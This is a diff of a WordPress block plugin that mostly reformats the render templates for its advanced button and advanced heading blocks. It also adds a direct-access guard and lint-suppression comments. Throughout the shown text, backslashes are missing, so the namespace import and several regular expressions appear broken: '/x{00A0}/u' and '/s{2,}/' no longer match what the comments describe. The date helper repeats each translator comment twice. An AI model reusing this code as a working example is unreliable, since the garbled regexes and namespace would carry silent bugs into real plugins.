-$block_id                  = fb_norm_str( isset($attributes['blockId']) ? $attributes['blockId'] : '' );
+$block_id = fb_norm_str(isset($attributes['blockId']) ? $attributes['blockId'] : '');

-$button_alignment          = fb_norm_str( isset($attributes['buttonAlignment']) ? $attributes['buttonAlignment'] : 'left' );
-$button_text_switcher      = isset($attributes['buttonTextSwitcher']) ? ! empty($attributes['buttonTextSwitcher']) : true;
-$button_text               = fb_norm_str( isset($attributes['buttonText']) ? $attributes['buttonText'] : 'Add Text' );
+$button_alignment = fb_norm_str(isset($attributes['buttonAlignment']) ? $attributes['buttonAlignment'] : 'left');
+$button_text_switcher = isset($attributes['buttonTextSwitcher']) ? !empty($attributes['buttonTextSwitcher']) : true;
+$button_text = fb_norm_str(isset($attributes['buttonText']) ? $attributes['buttonText'] : 'Add Text');

-$button_url                = fb_norm_str( isset($attributes['buttonUrl']) ? $attributes['buttonUrl'] : '' );
-$button_target_url         = ! empty( $attributes['buttonTargetUrl'] );
+$button_url = fb_norm_str(isset($attributes['buttonUrl']) ? $attributes['buttonUrl'] : '');
+$button_target_url = !empty($attributes['buttonTargetUrl']);

-$button_icon_align         = fb_norm_str( isset($attributes['buttonIconAlign']) ? $attributes['buttonIconAlign'] : 'none' ); // none|icon-text|image
-$button_icon_position      = fb_norm_str( isset($attributes['buttonIconPosition']) ? $attributes['buttonIconPosition'] : 'right' ); // left|right
+$button_icon_align = fb_norm_str(isset($attributes['buttonIconAlign']) ? $attributes['buttonIconAlign'] : 'none'); // none|icon-text|image
+$button_icon_position = fb_norm_str(isset($attributes['buttonIconPosition']) ? $attributes['buttonIconPosition'] : 'right'); // left|right

-$button_icon_frontend      = fb_norm_str( isset($attributes['buttonIconFrontend']) ? $attributes['buttonIconFrontend'] : '' );
-$button_icon_image_url     = fb_norm_str( isset($attributes['buttonIconImageUrl']) ? $attributes['buttonIconImageUrl'] : '' );
-$button_icon_image_alt     = fb_norm_str( isset($attributes['buttonIconImageAlt']) ? $attributes['buttonIconImageAlt'] : '' );
+$button_icon_frontend = fb_norm_str(isset($attributes['buttonIconFrontend']) ? $attributes['buttonIconFrontend'] : '');
+$button_icon_image_url = fb_norm_str(isset($attributes['buttonIconImageUrl']) ? $attributes['buttonIconImageUrl'] : '');
+$button_icon_image_alt = fb_norm_str(isset($attributes['buttonIconImageAlt']) ? $attributes['buttonIconImageAlt'] : '');

-$button_global_wraper_id   = fb_norm_str( isset($attributes['buttonGlobalWraperID']) ? $attributes['buttonGlobalWraperID'] : '' );
-$button_global_wraper_class= fb_norm_str( isset($attributes['buttonGlobalWraperClass']) ? $attributes['buttonGlobalWraperClass'] : '' );
+$button_global_wraper_id = fb_norm_str(isset($attributes['buttonGlobalWraperID']) ? $attributes['buttonGlobalWraperID'] : '');
+$button_global_wraper_class = fb_norm_str(isset($attributes['buttonGlobalWraperClass']) ? $attributes['buttonGlobalWraperClass'] : '');

-$advanced_btn_desktop      = ! empty( $attributes['advancedBtnDesktopSwitcher'] );
-$advanced_btn_tablet       = ! empty( $attributes['advancedBtnTabletSwitcher'] );
-$advanced_btn_mobile       = ! empty( $attributes['advancedBtnMobileSwitcher'] );
+$advanced_btn_desktop = !empty($attributes['advancedBtnDesktopSwitcher']);
+$advanced_btn_tablet = !empty($attributes['advancedBtnTabletSwitcher']);
+$advanced_btn_mobile = !empty($attributes['advancedBtnMobileSwitcher']);

 /* ---------- dynamic attributes ---------- */
-$dynamic_enabled           = ! empty( $attributes['dynamicTextEnabled'] );
-$dynamic_source            = fb_norm_str( isset($attributes['dynamicTextSource']) ? $attributes['dynamicTextSource'] : 'current_post' );
-$dynamic_post_id_attr      = fb_norm_str( isset($attributes['dynamicTextPostId']) ? $attributes['dynamicTextPostId'] : 0 );
-$dynamic_post_type_attr    = fb_norm_str( isset($attributes['dynamicTextPostType']) ? $attributes['dynamicTextPostType'] : '' );
-$dynamic_post_label        = fb_norm_str( isset($attributes['dynamicTextPostLabel']) ? $attributes['dynamicTextPostLabel'] : '' ); // not used directly, kept for UI
-$dynamic_field             = fb_norm_str( isset($attributes['dynamicTextField']) ? $attributes['dynamicTextField'] : 'post_title' );
-$dynamic_feat_img_field    = fb_norm_str( isset($attributes['dynamicFeaturedImageField']) ? $attributes['dynamicFeaturedImageField'] : 'title' );
-
-$dynamic_date_type         = fb_norm_str( isset($attributes['dynamicTextDateType']) ? $attributes['dynamicTextDateType'] : 'published' );
-$dynamic_date_format       = fb_norm_str( isset($attributes['dynamicTextDateFormat']) ? $attributes['dynamicTextDateFormat'] : 'default' );
-
-$dynamic_time_type         = fb_norm_str( isset($attributes['dynamicTextTimeType']) ? $attributes['dynamicTextTimeType'] : 'published' );
-$dynamic_time_format       = fb_norm_str( isset($attributes['dynamicTextTimeFormat']) ? $attributes['dynamicTextTimeFormat'] : 'default' );
-
-$dynamic_comments_zero     = fb_norm_str( isset($attributes['dynamicTextCommentsZeroText']) ? $attributes['dynamicTextCommentsZeroText'] : 'No Response' );
-$dynamic_comments_one      = fb_norm_str( isset($attributes['dynamicTextCommentsOneText']) ? $attributes['dynamicTextCommentsOneText'] : 'One Response' );
-$dynamic_comments_many     = fb_norm_str( isset($attributes['dynamicTextCommentsManyText']) ? $attributes['dynamicTextCommentsManyText'] : '{num} Response' );
+$dynamic_enabled = !empty($attributes['dynamicTextEnabled']);
+$dynamic_source = fb_norm_str(isset($attributes['dynamicTextSource']) ? $attributes['dynamicTextSource'] : 'current_post');
+$dynamic_post_id_attr = fb_norm_str(isset($attributes['dynamicTextPostId']) ? $attributes['dynamicTextPostId'] : 0);
+$dynamic_post_type_attr = fb_norm_str(isset($attributes['dynamicTextPostType']) ? $attributes['dynamicTextPostType'] : '');
+$dynamic_post_label = fb_norm_str(isset($attributes['dynamicTextPostLabel']) ? $attributes['dynamicTextPostLabel'] : ''); // not used directly, kept for UI
+$dynamic_field = fb_norm_str(isset($attributes['dynamicTextField']) ? $attributes['dynamicTextField'] : 'post_title');
+$dynamic_feat_img_field = fb_norm_str(isset($attributes['dynamicFeaturedImageField']) ? $attributes['dynamicFeaturedImageField'] : 'title');
+
+$dynamic_date_type = fb_norm_str(isset($attributes['dynamicTextDateType']) ? $attributes['dynamicTextDateType'] : 'published');
+$dynamic_date_format = fb_norm_str(isset($attributes['dynamicTextDateFormat']) ? $attributes['dynamicTextDateFormat'] : 'default');
+
+$dynamic_time_type = fb_norm_str(isset($attributes['dynamicTextTimeType']) ? $attributes['dynamicTextTimeType'] : 'published');
+$dynamic_time_format = fb_norm_str(isset($attributes['dynamicTextTimeFormat']) ? $attributes['dynamicTextTimeFormat'] : 'default');
+
+$dynamic_comments_zero = fb_norm_str(isset($attributes['dynamicTextCommentsZeroText']) ? $attributes['dynamicTextCommentsZeroText'] : 'No Response');
+$dynamic_comments_one = fb_norm_str(isset($attributes['dynamicTextCommentsOneText']) ? $attributes['dynamicTextCommentsOneText'] : 'One Response');
+$dynamic_comments_many = fb_norm_str(isset($attributes['dynamicTextCommentsManyText']) ? $attributes['dynamicTextCommentsManyText'] : '{num} Response');

-$dynamic_terms_taxonomy    = fb_norm_str( isset($attributes['dynamicTextTermsTaxonomy']) ? $attributes['dynamicTextTermsTaxonomy'] : 'category' );
-$dynamic_terms_separator   = fb_norm_str( isset($attributes['dynamicTextTermsSeparator']) ? $attributes['dynamicTextTermsSeparator'] : ',' );
+$dynamic_terms_taxonomy = fb_norm_str(isset($attributes['dynamicTextTermsTaxonomy']) ? $attributes['dynamicTextTermsTaxonomy'] : 'category');
+$dynamic_terms_separator = fb_norm_str(isset($attributes['dynamicTextTermsSeparator']) ? $attributes['dynamicTextTermsSeparator'] : ',');

-$dynamic_enable_link       = ! empty( $attributes['dynamicTextEnableLink'] );
-$dynamic_link_source       = fb_norm_str( isset($attributes['dynamicTextLinkSource']) ? $attributes['dynamicTextLinkSource'] : 'post_permalink' );
+$dynamic_enable_link = !empty($attributes['dynamicTextEnableLink']);
+$dynamic_link_source = fb_norm_str(isset($attributes['dynamicTextLinkSource']) ? $attributes['dynamicTextLinkSource'] : 'post_permalink');

 /**
  * Disable dynamic if not pro active
  */
-if ( ! Helper::isProActivated() ) {
-    $dynamic_enabled     = false;
-    $dynamic_enable_link = false;
+if (!Helper::isProActivated()) {
+	$dynamic_enabled = false;
+	$dynamic_enable_link = false;
 }

 /* ---------- compute dynamic via reusable function ---------- */
-$btn_dyn = fb_compute_dynamic_text( [
-	'enabled'             => $dynamic_enabled,
-	'source'              => $dynamic_source,
-	'field'               => $dynamic_field,
-	'post_id'             => $dynamic_post_id_attr,
-	'post_type'           => $dynamic_post_type_attr,
-	'featured_image_field'=> $dynamic_feat_img_field,
-	'date_type'           => $dynamic_date_type,
-	'date_format'         => $dynamic_date_format,
-	'time_type'           => $dynamic_time_type,
-	'time_format'         => $dynamic_time_format,
-	'comments_zero'       => $dynamic_comments_zero,
-	'comments_one'        => $dynamic_comments_one,
-	'comments_many'       => $dynamic_comments_many,
-	'terms_taxonomy'      => $dynamic_terms_taxonomy,
-	'terms_separator'     => $dynamic_terms_separator,
-	'link_enabled'        => $dynamic_enable_link,
-	'link_source'         => $dynamic_link_source,
-] );
+$btn_dyn = fb_compute_dynamic_text([
+	'enabled' => $dynamic_enabled,
+	'source' => $dynamic_source,
+	'field' => $dynamic_field,
+	'post_id' => $dynamic_post_id_attr,
+	'post_type' => $dynamic_post_type_attr,
+	'featured_image_field' => $dynamic_feat_img_field,
+	'date_type' => $dynamic_date_type,
+	'date_format' => $dynamic_date_format,
+	'time_type' => $dynamic_time_type,
+	'time_format' => $dynamic_time_format,
+	'comments_zero' => $dynamic_comments_zero,
+	'comments_one' => $dynamic_comments_one,
+	'comments_many' => $dynamic_comments_many,
+	'terms_taxonomy' => $dynamic_terms_taxonomy,
+	'terms_separator' => $dynamic_terms_separator,
+	'link_enabled' => $dynamic_enable_link,
+	'link_source' => $dynamic_link_source,
+]);

 // final text (dynamic or manual)
 $final_button_text = $dynamic_enabled ? $btn_dyn['value'] : $button_text;

 // final link (dynamic takes priority when enabled & URL exists)
 $final_href = '';
-if ( $dynamic_enabled && $dynamic_enable_link && ! empty( $btn_dyn['link_url'] ) ) {
-	$final_href = esc_url( $btn_dyn['link_url'] );
+if ($dynamic_enabled && $dynamic_enable_link && !empty($btn_dyn['link_url'])) {
+	$final_href = esc_url($btn_dyn['link_url']);
 } else {
-	$final_href = esc_url( $button_url );
+	$final_href = esc_url($button_url);
 }
 $final_target = $button_target_url ? ' target="_blank" rel="noopener noreferrer"' : '';

 /* ---------- classes ---------- */
 $responsive_classes = [];
-if ( $advanced_btn_desktop ) $responsive_classes[] = 'fb-desktop-responsive';
-if ( $advanced_btn_tablet  ) $responsive_classes[] = 'fb-tablet-responsive';
-if ( $advanced_btn_mobile  ) $responsive_classes[] = 'fb-mobile-responsive';
+if ($advanced_btn_desktop)
+	$responsive_classes[] = 'fb-desktop-responsive';
+if ($advanced_btn_tablet)
+	$responsive_classes[] = 'fb-tablet-responsive';
+if ($advanced_btn_mobile)
+	$responsive_classes[] = 'fb-mobile-responsive';

-$base_classes = array_merge( ['frontis-block', 'fb-advanced-button-main-wrapper', $block_id], $responsive_classes );
+$base_classes = array_merge(['frontis-block', 'fb-advanced-button-main-wrapper', $block_id], $responsive_classes);

 // sanitize and keep as array
-$wrapper_classes_arr = array_filter( array_map( function( $c ) {
-    return sanitize_html_class( fb_norm_str( $c ) );
-}, $base_classes ) );
+$wrapper_classes_arr = array_filter(array_map(function ($c) {
+	return sanitize_html_class(fb_norm_str($c));
+}, $base_classes));

 // precompute wrapper attributes string
-$wrapper_attributes = get_block_wrapper_attributes( [
-    'class' => implode( ' ', $wrapper_classes_arr ),
-] );
+$wrapper_attributes = get_block_wrapper_attributes([
+	'class' => implode(' ', $wrapper_classes_arr),
+]);

 ?>
-<div <?php echo $wrapper_attributes; ?>>
-    <div
-        class="fb-parent-wrapper fb-advanced-button-wrapper <?php echo esc_attr( $button_global_wraper_class ); ?>"
-        <?php if ( $button_global_wraper_id ) : ?>
-            id="<?php echo esc_attr( $button_global_wraper_id ); ?>"
-        <?php endif; ?>
-        <?php if ( $button_alignment ) : ?>
-            style="text-align:<?php echo esc_attr( $button_alignment ); ?>;"
-        <?php endif; ?>
-    >
-        <a class="fb-advanced-button"<?php echo $final_href ? ' href="'.$final_href.'"' : ''; ?><?php echo $final_target; ?>>
-
-            <?php if ( $button_icon_position === 'left' && $button_icon_align === 'icon-text' ) : ?>
-                <div class="fb-advanced-button-icon-wrapper left">
-                    <div class="fb-advanced-button-icon"><?php echo $button_icon_frontend; ?></div>
-                </div>
-            <?php endif; ?>
-
-            <?php if ( $button_icon_position === 'left' && $button_icon_align === 'image' && $button_icon_image_url ) : ?>
-                <div class="fb-advanced-button-icon-wrapper left">
-                    <div class="fb-advanced-button-icon-image">
-                        <img src="<?php echo esc_url( $button_icon_image_url ); ?>" alt="<?php echo esc_attr( $button_icon_image_alt ); ?>" />
-                    </div>
-                </div>
-            <?php endif; ?>
-
-            <?php if ( $button_text_switcher ) : ?>
-                <span class="fb-advanced-button-text">
-                    <?php echo wp_kses_post( $final_button_text !== '' ? $final_button_text : '' ); ?>
-                </span>
-            <?php endif; ?>
-
-            <?php if ( $button_icon_position === 'right' && $button_icon_align === 'icon-text' ) : ?>
-                <div class="fb-advanced-button-icon-wrapper right">
-                    <div class="fb-advanced-button-icon"><?php echo $button_icon_frontend; ?></div>
-                </div>
-            <?php endif; ?>
-
-            <?php if ( $button_icon_position === 'right' && $button_icon_align === 'image' && $button_icon_image_url ) : ?>
-                <div class="fb-advanced-button-icon-wrapper right">
-                    <div class="fb-advanced-button-icon-image">
-                        <img src="<?php echo esc_url( $button_icon_image_url ); ?>" alt="<?php echo esc_attr( $button_icon_image_alt ); ?>" />
-                    </div>
-                </div>
-            <?php endif; ?>
+<div <?php echo $wrapper_attributes; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>>
+	<div class="fb-parent-wrapper fb-advanced-button-wrapper <?php echo esc_attr($button_global_wraper_class); ?>" <?php if ($button_global_wraper_id): ?> id="<?php echo esc_attr($button_global_wraper_id); ?>" <?php endif; ?> <?php if ($button_alignment): ?> style="text-align:<?php echo esc_attr($button_alignment); ?>;" <?php endif; ?>>
+		<a class="fb-advanced-button" <?php echo $final_href ? ' href="' . $final_href . '"' : ''; ?><?php echo $final_target; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>>
+
+			<?php if ($button_icon_position === 'left' && $button_icon_align === 'icon-text'): ?>
+				<div class="fb-advanced-button-icon-wrapper left">
+					<div class="fb-advanced-button-icon">
+						<?php echo $button_icon_frontend; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
+					</div>
+				</div>
+			<?php endif; ?>
+
+			<?php if ($button_icon_position === 'left' && $button_icon_align === 'image' && $button_icon_image_url): ?>
+				<div class="fb-advanced-button-icon-wrapper left">
+					<div class="fb-advanced-button-icon-image">
+						<img src="<?php echo esc_url($button_icon_image_url); ?>"
+							alt="<?php echo esc_attr($button_icon_image_alt); ?>" />
+					</div>
+				</div>
+			<?php endif; ?>
+
+			<?php if ($button_text_switcher): ?>
+				<span class="fb-advanced-button-text">
+					<?php echo wp_kses_post($final_button_text !== '' ? $final_button_text : ''); ?>
+				</span>
+			<?php endif; ?>
+
+			<?php if ($button_icon_position === 'right' && $button_icon_align === 'icon-text'): ?>
+				<div class="fb-advanced-button-icon-wrapper right">
+					<div class="fb-advanced-button-icon">
+						<?php echo $button_icon_frontend; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
+					</div>
+				</div>
+			<?php endif; ?>
+
+			<?php if ($button_icon_position === 'right' && $button_icon_align === 'image' && $button_icon_image_url): ?>
+				<div class="fb-advanced-button-icon-wrapper right">
+					<div class="fb-advanced-button-icon-image">
+						<img src="<?php echo esc_url($button_icon_image_url); ?>"
+							alt="<?php echo esc_attr($button_icon_image_alt); ?>" />
+					</div>
+				</div>
+			<?php endif; ?>

-        </a>
-    </div>
+		</a>
+	</div>
 </div>
 No newline at end of file
--- a/frontis-blocks/build/blocks/advanced-heading/index.asset.php
+++ b/frontis-blocks/build/blocks/advanced-heading/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-core-data', 'wp-data', 'wp-date', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n'), 'version' => '9fb5c03bfd296f088e15');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-core-data', 'wp-data', 'wp-date', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n'), 'version' => '80dfa2a37ecc836df831');
--- a/frontis-blocks/build/blocks/advanced-heading/render.php
+++ b/frontis-blocks/build/blocks/advanced-heading/render.php
@@ -1,77 +1,151 @@
 <?php

+if (!defined('ABSPATH')) {
+	exit;
+}
+
 use FrontisBlocksUtilsHelper;

 // ---------- helpers ----------
-if ( ! function_exists('fb_norm_str') ) {
-    function fb_norm_str($val, $default = '') {
-        if (is_array($val)) {
-            $val = implode(' ', array_filter(array_map('strval', $val)));
-        }
-        if ($val === null) return $default;
-        return (string) $val;
-    }
+if (!function_exists('fb_norm_str')) {
+	function fb_norm_str($val, $default = '')
+	{
+		if (is_array($val)) {
+			$val = implode(' ', array_filter(array_map('strval', $val)));
+		}
+		if ($val === null)
+			return $default;
+		return (string) $val;
+	}
 }

-if ( ! function_exists('fb_tag_whitelist') ) {
-    function fb_tag_whitelist($tag, $fallback = 'div') {
-        $allowed = ['h1','h2','h3','h4','h5','h6','p','div','span'];
-        $tag = strtolower(fb_norm_str($tag, $fallback));
-        return in_array($tag, $allowed, true) ? $tag : $fallback;
-    }
+if (!function_exists('fb_tag_whitelist')) {
+	function fb_tag_whitelist($tag, $fallback = 'div')
+	{
+		$allowed = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'p', 'div', 'span'];
+		$tag = strtolower(fb_norm_str($tag, $fallback));
+		return in_array($tag, $allowed, true) ? $tag : $fallback;
+	}
 }

 // --- Dynamic helpers ---
-if ( ! function_exists('fb_get_plain_text') ) {
-	function fb_get_plain_text( $html ) {
-		$raw = (string) ( $html ?? '' );
-		$decoded = wp_specialchars_decode( $raw, ENT_QUOTES );
-		$decoded = html_entity_decode( $decoded, ENT_QUOTES, 'UTF-8' );
-		$txt = wp_strip_all_tags( $decoded, true );
-		$txt = preg_replace( '/x{00A0}/u', ' ', $txt ); // nbsp
-		$txt = preg_replace( '/[x{200B}-x{200D}x{FEFF}]/u', '', $txt ); // zero-width
-		$txt = preg_replace( '/s{2,}/', ' ', $txt );
-		return trim( (string) $txt );
+if (!function_exists('fb_get_plain_text')) {
+	function fb_get_plain_text($html)
+	{
+		$raw = (string) ($html ?? '');
+		$decoded = wp_specialchars_decode($raw, ENT_QUOTES);
+		$decoded = html_entity_decode($decoded, ENT_QUOTES, 'UTF-8');
+		$txt = wp_strip_all_tags($decoded, true);
+		$txt = preg_replace('/x{00A0}/u', ' ', $txt); // nbsp
+		$txt = preg_replace('/[x{200B}-x{200D}x{FEFF}]/u', '', $txt); // zero-width
+		$txt = preg_replace('/s{2,}/', ' ', $txt);
+		return trim((string) $txt);
 	}
 }

-if ( ! function_exists('fb_humanize_date') ) {
-	function fb_humanize_date( $date ) {
-		if ( ! $date ) return '';
-		$timestamp = is_numeric( $date ) ? (int) $date : strtotime( (string) $date );
-		if ( ! $timestamp ) return '';
+if (!function_exists('fb_humanize_date')) {
+	function fb_humanize_date($date)
+	{
+		if (!$date)
+			return '';
+		$timestamp = is_numeric($date) ? (int) $date : strtotime((string) $date);
+		if (!$timestamp)
+			return '';
 		$diff = time() - $timestamp;
-		$abs  = abs( $diff );
+		$abs = abs($diff);

 		$units = [
-			'year'   => 31536000,
-			'month'  => 2592000,
-			'week'   => 604800,
-			'day'    => 86400,
-			'hour'   => 3600,
+			'year' => 31536000,
+			'month' => 2592000,
+			'week' => 604800,
+			'day' => 86400,
+			'hour' => 3600,
 			'minute' => 60,
 			'second' => 1,
 		];
-		foreach ( $units as $u => $s ) {
-			$v = floor( $abs / $s );
-			if ( $v >= 1 ) {
-				return $diff >= 0 ? sprintf( _n( '%d '.$u.' ago', '%d '.$u.'s ago', $v, 'frontis-blocks' ), $v )
-				                  : sprintf( _n( 'in %d '.$u, 'in %d '.$u.'s', $v, 'frontis-blocks' ), $v );
+		foreach ($units as $u => $s) {
+			$v = floor($abs / $s);
+			if ($v >= 1) {
+				if ($diff >= 0) {
+					switch ($u) {
+						case 'year':
+							/* translators: %d: number of years */
+							/* translators: %d: number of years */
+							return sprintf(_n('%d year ago', '%d years ago', $v, 'frontis-blocks'), $v);
+						case 'month':
+							/* translators: %d: number of months */
+							/* translators: %d: number of months */
+							return sprintf(_n('%d month ago', '%d months ago', $v, 'frontis-blocks'), $v);
+						case 'week':
+							/* translators: %d: number of weeks */
+							/* translators: %d: number of weeks */
+							return sprintf(_n('%d week ago', '%d weeks ago', $v, 'frontis-blocks'), $v);
+						case 'day':
+							/* translators: %d: number of days */
+							/* translators: %d: number of days */
+							return sprintf(_n('%d day ago', '%d days ago', $v, 'frontis-blocks'), $v);
+						case 'hour':
+							/* translators: %d: number of hours */
+							/* translators: %d: number of hours */
+							return sprintf(_n('%d hour ago', '%d hours ago', $v, 'frontis-blocks'), $v);
+						case 'minute':
+							/* translators: %d: number of minutes */
+							/* translators: %d: number of minutes */
+							return sprintf(_n('%d minute ago', '%d minutes ago', $v, 'frontis-blocks'), $v);
+						case 'second':
+							/* translators: %d: number of seconds */
+							/* translators: %d: number of seconds */
+							return sprintf(_n('%d second ago', '%d seconds ago', $v, 'frontis-blocks'), $v);
+					}
+				} else {
+					switch ($u) {
+						case 'year':
+							/* translators: %d: number of years */
+							/* translators: %d: number of years */
+							return sprintf(_n('in %d year', 'in %d years', $v, 'frontis-blocks'), $v);
+						case 'month':
+							/* translators: %d: number of months */
+							/* translators: %d: number of months */
+							return sprintf(_n('in %d month', 'in %d months', $v, 'frontis-blocks'), $v);
+						case 'week':
+							/* translators: %d: number of weeks */
+							/* translators: %d: number of weeks */
+							return sprintf(_n('in %d week', 'in %d weeks', $v, 'frontis-blocks'), $v);
+						case 'day':
+							/* translators: %d: number of days */
+							/* translators: %d: number of days */
+							return sprintf(_n('in %d day', 'in %d days', $v, 'frontis-blocks'), $v);
+						case 'hour':
+							/* translators: %d: number of hours */
+							/* translators: %d: number of hours */
+							return sprintf(_n('in %d hour', 'in %d hours', $v, 'frontis-blocks'), $v);
+						case 'minute':
+							/* translators: %d: number of minutes */
+							/* translators: %d: number of minutes */
+							return sprintf(_n('in %d minute', 'in %d minutes', $v, 'frontis-blocks'), $v);
+						case 'second':
+							/* translators: %d: number of seconds */
+							/* translators: %d: number of seconds */
+							return sprintf(_n('in %d second', 'in %d seconds', $v, 'frontis-blocks'), $v);
+					}
+				}
 			}
 		}
-		return __( 'just now', 'frontis-blocks' );
+		return __('just now', 'frontis-blocks');
 	}
 }

-if ( ! function_exists('fb_get_site_date_format') ) {
-	function fb_get_site_date_format() {
-		$fmt = get_option( 'date_format' );
+if (!function_exists('fb_get_site_date_format')) {
+	function fb_get_site_date_format()
+	{
+		$fmt = get_option('date_format');
 		return $fmt ? $fmt : 'F j, Y';
 	}
 }
-if ( ! function_exists('fb_get_site_time_format') ) {
-	function fb_get_site_time_format() {
-		$fmt = get_option( 'time_format' );
+if (!function_exists('fb_get_site_time_format')) {
+	function fb_get_site_time_format()
+	{
+		$fmt = get_option('time_format');
 		return $fmt ? $fmt : 'g:i a';
 	}
 }
@@ -82,139 +156,153 @@
  * @param array $args
  * @return array{ value: string, link_url: string, permalink: string }
  */
-if ( ! function_exists('fb_compute_dynamic_text') ) {
-	function fb_compute_dynamic_text( $args ) {
-		$enabled                  = ! empty( $args['enabled'] );
-		$source                   = fb_norm_str( $args['source'] ?? 'current_post' );
-		$field                    = fb_norm_str( $args['field'] ?? 'post_title' );
-
-		$post_id_in               = fb_norm_str( $args['post_id'] ?? 0 );
-		$post_type_in             = fb_norm_str( $args['post_type'] ?? '' );
-		$featured_image_field     = fb_norm_str( $args['featured_image_field'] ?? 'title' );
-
-		$date_type                = fb_norm_str( $args['date_type'] ?? 'published' );
-		$date_format              = fb_norm_str( $args['date_format'] ?? 'default' );
-		$time_type                = fb_norm_str( $args['time_type'] ?? 'published' );
-		$time_format              = fb_norm_str( $args['time_format'] ?? 'default' );
-
-		$cm_zero                  = fb_norm_str( $args['comments_zero'] ?? '' );
-		$cm_one                   = fb_norm_str( $args['comments_one'] ?? '' );
-		$cm_many                  = fb_norm_str( $args['comments_many'] ?? '' );
+if (!function_exists('fb_compute_dynamic_text')) {
+	function fb_compute_dynamic_text($args)
+	{
+		$enabled = !empty($args['enabled']);
+		$source = fb_norm_str($args['source'] ?? 'current_post');
+		$field = fb_norm_str($args['field'] ?? 'post_title');
+
+		$post_id_in = fb_norm_str($args['post_id'] ?? 0);
+		$post_type_in = fb_norm_str($args['post_type'] ?? '');
+		$featured_image_field = fb_norm_str($args['featured_image_field'] ?? 'title');
+
+		$date_type = fb_norm_str($args['date_type'] ?? 'published');
+		$date_format = fb_norm_str($args['date_format'] ?? 'default');
+		$time_type = fb_norm_str($args['time_type'] ?? 'published');
+		$time_format = fb_norm_str($args['time_format'] ?? 'default');
+
+		$cm_zero = fb_norm_str($args['comments_zero'] ?? '');
+		$cm_one = fb_norm_str($args['comments_one'] ?? '');
+		$cm_many = fb_norm_str($args['comments_many'] ?? '');

-		$terms_tax                = fb_norm_str( $args['terms_taxonomy'] ?? 'category' );
-		$terms_sep                = fb_norm_str( $args['terms_separator'] ?? '' );
+		$terms_tax = fb_norm_str($args['terms_taxonomy'] ?? 'category');
+		$terms_sep = fb_norm_str($args['terms_separator'] ?? '');

-		$link_enabled             = ! empty( $args['link_enabled'] );
-		$link_source              = fb_norm_str( $args['link_source'] ?? 'post_permalink' );
+		$link_enabled = !empty($args['link_enabled']);
+		$link_source = fb_norm_str($args['link_source'] ?? 'post_permalink');

 		$out_value = '';
-		$link_url  = '';
+		$link_url = '';
 		$permalink = '';

-		if ( ! $enabled ) {
-			return [ 'value' => '', 'link_url' => '', 'permalink' => '' ];
+		if (!$enabled) {
+			return ['value' => '', 'link_url' => '', 'permalink' => ''];
 		}

-		$is_site_field    = in_array( $source, ['site_title','site_tagline'], true );
-		$is_archive_field = in_array( $source, ['archive_title','archive_description'], true );
-		$is_post_based    = in_array( $source, ['current_post','post_type'], true );
-
-		$target_post_id   = ($source === 'post_type' && $post_id_in) ? (int) $post_id_in : get_the_ID();
-		$target_post_type = ($source === 'post_type' && $post_type_in) ? $post_type_in : get_post_type( $target_post_id );
-
-		if ( $is_site_field ) {
-			if ( $source === 'site_title' ) {
-				$out_value = fb_get_plain_text( get_bloginfo( 'name' ) ?: __( 'No Content', 'frontis-blocks' ) );
+		$is_site_field = in_array($source, ['site_title', 'site_tagline'], true);
+		$is_archive_field = in_array($source, ['archive_title', 'archive_description'], true);
+		$is_post_based = in_array($source, ['current_post', 'post_type'], true);
+
+		$target_post_id = ($source === 'post_type' && $post_id_in) ? (int) $post_id_in : get_the_ID();
+		$target_post_type = ($source === 'post_type' && $post_type_in) ? $post_type_in : get_post_type($target_post_id);
+
+		if ($is_site_field) {
+			if ($source === 'site_title') {
+				$out_value = fb_get_plain_text(get_bloginfo('name') ?: __('No Content', 'frontis-blocks'));
 			} else {
-				$out_value = fb_get_plain_text( get_bloginfo( 'description' ) ?: __( 'No Content', 'frontis-blocks' ) );
+				$out_value = fb_get_plain_text(get_bloginfo('description') ?: __('No Content', 'frontis-blocks'));
 			}
-		}
-		elseif ( $is_archive_field ) {
-			if ( $source === 'archive_title' ) {
-				$out_value = fb_get_plain_text( get_the_archive_title() ?: __( 'No Content', 'frontis-blocks' ) );
+		} elseif ($is_archive_field) {
+			if ($source === 'archive_title') {
+				$out_value = fb_get_plain_text(get_the_archive_title() ?: __('No Content', 'frontis-blocks'));
 			} else {
-				$out_value = fb_get_plain_text( get_the_archive_description() ?: __( 'No Content', 'frontis-blocks' ) );
+				$out_value = fb_get_plain_text(get_the_archive_description() ?: __('No Content', 'frontis-blocks'));
 			}
-		}
-		elseif ( $is_post_based && $target_post_id ) {
-			$_post = get_post( $target_post_id );
+		} elseif ($is_post_based && $target_post_id) {
+			$_post = get_post($target_post_id);

-			if ( $_post && ! is_wp_error( $_post ) ) {
-				$permalink = get_permalink( $_post );
+			if ($_post && !is_wp_error($_post)) {
+				$permalink = get_permalink($_post);
 			}

-			switch ( $field ) {
+			switch ($field) {
 				case 'post_title':
-					$out_value = fb_get_plain_text( $_post ? get_the_title( $_post ) : '' );
+					$out_value = fb_get_plain_text($_post ? get_the_title($_post) : '');
 					break;

 				case 'post_excerpt':
-					if ( $_post ) {
-						$raw = has_excerpt( $_post ) ? $_post->post_excerpt : '';
-						$out_value = $raw ? fb_get_plain_text( $raw ) : __( 'No Content', 'frontis-blocks' );
+					if ($_post) {
+						$raw = has_excerpt($_post) ? $_post->post_excerpt : '';
+						$out_value = $raw ? fb_get_plain_text($raw) : __('No Content', 'frontis-blocks');
 					}
 					break;

 				case 'post_thumbnail':
-					$thumb_id = $_post ? get_post_thumbnail_id( $_post ) : 0;
-					if ( ! $thumb_id ) { $out_value = __( 'No Content', 'frontis-blocks' ); break; }
+					$thumb_id = $_post ? get_post_thumbnail_id($_post) : 0;
+					if (!$thumb_id) {
+						$out_value = __('No Content', 'frontis-blocks');
+						break;
+					}
 					$sub = $featured_image_field ?: 'attachment_url';
-					switch ( $sub ) {
+					switch ($sub) {
 						case 'title':
